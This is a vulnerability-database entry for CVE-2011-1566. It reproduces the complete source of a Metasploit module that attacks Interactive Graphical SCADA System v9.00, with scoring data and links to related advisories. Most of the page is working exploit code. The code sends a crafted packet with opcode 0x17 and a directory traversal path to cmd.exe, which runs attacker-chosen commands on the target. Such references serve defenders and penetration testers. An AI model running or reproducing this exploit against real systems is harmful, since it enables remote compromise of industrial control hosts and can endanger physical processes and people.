Lucene search
HistoryOct 17, 2013 - 7:07 p.m.
Interactive Graphical SCADA System Remote Command Injection
CVSS2
10
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
EPSS
0.879
Percentile
98.7%
This module abuses a directory traversal flaw in Interactive Graphical SCADA System v9.00. In conjunction with the traversal flaw, if opcode 0x17 is sent to the dc.exe process, an attacker may be able to execute arbitrary system commands.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Interactive Graphical SCADA System Remote Command Injection',
'Description' => %q{
This module abuses a directory traversal flaw in Interactive
Graphical SCADA System v9.00. In conjunction with the traversal
flaw, if opcode 0x17 is sent to the dc.exe process, an attacker
may be able to execute arbitrary system commands.
},
'Author' =>
[
'Luigi Auriemma',
'MC'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2011-1566'],
[ 'OSVDB', '72349'],
[ 'URL', 'http://aluigi.org/adv/igss_8-adv.txt' ],
],
'Platform' => 'win',
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 153,
'DisableNops' => true
},
'Targets' =>
[
[ 'Windows', {} ]
],
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => '2011-03-21'))
register_options(
[
Opt::RPORT(12397)
])
end
def exploit
print_status("Sending exploit packet...")
connect
packet = [0x00000100].pack('V') + [0x00000000].pack('V')
packet << [0x00000100].pack('V') + [0x00000017].pack('V')
packet << [0x00000000].pack('V') + [0x00000000].pack('V')
packet << [0x00000000].pack('V') + [0x00000000].pack('V')
packet << [0x00000000].pack('V') + [0x00000000].pack('V')
packet << [0x00000000].pack('V')
packet << "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\"
packet << "windows\\system32\\cmd.exe\" /c #{payload.encoded}"
packet << "\x00" * (143) #
sock.put(packet)
sock.get_once(-1,0.5)
disconnect
end
end
Related
openvas
openvas
zdt
zdt
Interactive Graphical SCADA System Remote Command Injection
2013-10-22 00:00:00
exploitdb
exploitdb
Interactive Graphical SCADA System - Remote Command Injection (Metasploit)
2013-10-22 00:00:00
7-Technologies IGSS 9.00.00.11059 - Multiple Vulnerabilities
2011-03-22 00:00:00
cve
cve
CVE-2011-1566
2011-04-05 15:19:36
packetstorm
packetstorm
Interactive Graphical SCADA System Remote Command Injection
2013-10-22 00:00:00
nvd
nvd
CVE-2011-1566
2011-04-05 15:19:36
checkpoint_advisories
checkpoint_advisories
cvelist
cvelist
CVE-2011-1566
2011-04-05 15:00:00
prion
prion
Directory traversal
2011-04-05 15:19:00
metasploit
metasploit
7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities
2011-05-30 21:00:49
saint
saint
7T Interactive Graphical SCADA System dc.exe Directory Traversal
2011-06-03 00:00:00
7T Interactive Graphical SCADA System dc.exe Directory Traversal
2011-06-03 00:00:00
7T Interactive Graphical SCADA System dc.exe Directory Traversal
2011-06-03 00:00:00
CVSS2
10
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
EPSS
0.879
Percentile
98.7%
Related for MSF:EXPLOIT-WINDOWS-SCADA-IGSS_EXEC_17-